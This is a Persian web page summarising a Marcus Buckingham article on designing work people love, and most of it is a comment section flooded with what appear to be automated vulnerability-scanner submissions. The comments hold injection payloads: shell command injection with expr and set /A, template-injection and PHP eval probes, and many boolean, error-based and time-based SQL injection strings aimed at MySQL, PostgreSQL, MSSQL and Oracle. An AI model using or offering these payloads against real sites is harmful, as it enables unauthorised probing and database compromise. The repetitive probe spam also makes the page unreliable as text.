گروه محصولات

عنوان مقاله: طراحی کاری که افراد عاشقش باشند

گزیده مدیریت 230

By Marcus Buckingham

نوشته: مارکوس باکینگهام

ترجمه: آرزو کیارسی

استعفاها به بالاترین حد خود رسیده است و شرکت‌هایی که از پرکردن جاهای خالی ناامید هستند، هر چیزی از افزایش حقوق گرفته تا مزایای مد روز را امتحان می‌کنند. اما این مداخلات اثر گذرایی دارند، زیرا همان‌طور که نویسنده توضیح ‌می‌دهد، مشکل واقعی این است که بسیاری از مشاغل استرس‌زا، بی‌معنی و دوست‌نداشتنی هستند.

داده‌های باکینگهام در مورد آن‌چه ‌کارکنان را مشارکت‌جو نگه می‌دارد (از کار او در موسسه تحقیقاتی اِی.دی.پی)نشان می‌دهد شرکت‌ها باید رویکرد خود را به سوی مدیریت عملکرد تغییر دهند تا از مهارت‌ها و علایق منحصربه‌فرد هر یک از کارکنان بهره ببرند. این امر نیاز به سه تغییر ذهنیت دارد:در نظر گرفتن کارکنان به‌عنوان ذینفعان کلیدی سازمان؛ دورشدن از استانداردسازی در ابزارهای مدیریت عملکرد؛ و اعتماد به کارکنان برای رسیدن به اهداف عملکردی خود با روش‌هایی که مناسب می‌بینند.

امروزه هیچ شرکتی مصداق کامل سازمان «عشق+ کار» (مطابق توصیف باکینگهام) نیست، اما لولولمون، والمارت، آمازون، مکنزی و سیسکو از جمله شرکت‌هایی هستند که شروع به استقبال از برخی از ویژگی‌های آن کرده‌اند و بهبودهایی را در نگهداشت و عملکرد کلی کارکنان شاهد بوده‌اند

انصراف از نظر
نظرات
20/05/1402 07:14 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456

123456
expr 885206078 + 960531374

20/05/1402 07:21 ق.ظ
123456

123456|expr 910307430 + 931679316

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

${@var_dump(md5(401521955))};

20/05/1402 07:21 ق.ظ
123456

123456$(expr 837991020 + 877976651)

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

'-var_dump(md5(621344597))-'

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456&set /A 863173648+880508213

20/05/1402 07:21 ق.ظ
/*1*/{{974166145+986831343}}

123456

20/05/1402 07:21 ق.ظ
${@var_dump(md5(231395555))};

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

expr 941808469 + 916584863

20/05/1402 07:21 ق.ظ
${998776891+936040739}

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
'-var_dump(md5(846811502))-'

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
${(879013435+908520583)?c}

123456

20/05/1402 07:21 ق.ظ
123456 expr 857365924 + 935768186

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
#set($c=928614889+813737018)${c}$c

123456

20/05/1402 07:21 ق.ظ
123456|expr 839935335 + 862119545

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
<%- 830639154+960658233 %>

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456$(expr 833499761 + 825963234)

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

${835742489+919323879}

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456&set /A 835317517+947369718

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
${886925878+847735382}

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
expr 920799297 + 911830630

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

/*1*/{{871909738+947873581}}

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

${800305688+861309526}

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

${(843887293+813985386)?c}

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

#set($c=912477779+987702231)${c}$c

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

<%- 836354540+981828279 %>

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456/**/and+2=2

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456/**/and+2=6

20/05/1402 07:24 ق.ظ
123456

123456'and/**/extractvalue(1,concat(char(126),md5(1955887724)))and'

20/05/1402 07:24 ق.ظ
123456

123456'and't'='t

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456"and/**/extractvalue(1,concat(char(126),md5(1590979299)))and"

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456'and'h'='h

20/05/1402 07:24 ق.ظ
123456

extractvalue(1,concat(char(126),md5(1356325978)))

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456"and"a"="a

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456'and(select'1'from/**/cast(md5(1089352324)as/**/int))>'0

20/05/1402 07:24 ق.ظ
123456

123456"and"m"="p

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

(select*from(select+sleep(0)union/**/select+1)a)

20/05/1402 07:24 ق.ظ
123456

123456/**/and/**/cast(md5('1963437898')as/**/int)>0

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

(select*from(select+sleep(7)union/**/select+1)a)

20/05/1402 07:24 ق.ظ
123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1863734394')))

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

20/05/1402 07:24 ق.ظ
123456

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1380128618')))>'0

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:24 ق.ظ
123456

123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='

20/05/1402 07:24 ق.ظ
123456

123456鎈'"\(

20/05/1402 07:24 ق.ظ
123456

123456

20/05/1402 07:25 ق.ظ
123456

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

20/05/1402 07:25 ق.ظ
123456

123456'"\(

20/05/1402 07:25 ق.ظ
123456

123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="

20/05/1402 07:25 ق.ظ
123456'and/**/extractvalue(1,concat(char(126),md5(1576788403)))and'

123456

20/05/1402 07:25 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

20/05/1402 07:25 ق.ظ
123456"and/**/extractvalue(1,concat(char(126),md5(1188622533)))and"

123456

20/05/1402 07:25 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/

20/05/1402 07:25 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

20/05/1402 07:25 ق.ظ
extractvalue(1,concat(char(126),md5(1048555200)))

123456

20/05/1402 07:25 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0

20/05/1402 07:25 ق.ظ
123456'and(select'1'from/**/cast(md5(1808524023)as/**/int))>'0

123456

20/05/1402 07:25 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

20/05/1402 07:25 ق.ظ
123456/**/and/**/cast(md5('1087188867')as/**/int)>0

123456

20/05/1402 07:25 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/

20/05/1402 07:25 ق.ظ
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1384946446')))

123456

20/05/1402 07:25 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:0

20/05/1402 07:25 ق.ظ
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1866257679')))>'0

123456

20/05/1402 07:25 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:7

20/05/1402 07:26 ق.ظ
123456

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('b',0)

20/05/1402 07:26 ق.ظ
123456鎈'"\(

123456

20/05/1402 07:26 ق.ظ
123456

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('i',7)

20/05/1402 07:26 ق.ظ
123456'"\(

123456

20/05/1402 07:26 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a

20/05/1402 07:26 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',7)='y

20/05/1402 07:26 ق.ظ
123456/**/and+1=1

123456

20/05/1402 07:26 ق.ظ
123456/**/and+4=6

123456

20/05/1402 07:26 ق.ظ
123456'and'c'='c

123456

20/05/1402 07:26 ق.ظ
123456'and'm'='n

123456

20/05/1402 07:26 ق.ظ
123456"and"i"="i

123456

20/05/1402 07:26 ق.ظ
123456"and"p"="h

123456

20/05/1402 07:27 ق.ظ
(select*from(select+sleep(0)union/**/select+1)a)

123456

20/05/1402 07:27 ق.ظ
(select*from(select+sleep(7)union/**/select+1)a)

123456

20/05/1402 07:27 ق.ظ
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

20/05/1402 07:27 ق.ظ
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

20/05/1402 07:27 ق.ظ
123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="

123456

20/05/1402 07:27 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

123456

20/05/1402 07:27 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/

123456

20/05/1402 07:28 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

20/05/1402 07:28 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0

123456

20/05/1402 07:28 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

123456

20/05/1402 07:28 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/

123456

20/05/1402 07:28 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:0

123456

20/05/1402 07:28 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:7

123456

20/05/1402 07:29 ق.ظ
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',0)

123456

20/05/1402 07:29 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t

123456

20/05/1402 07:29 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',7)='q

123456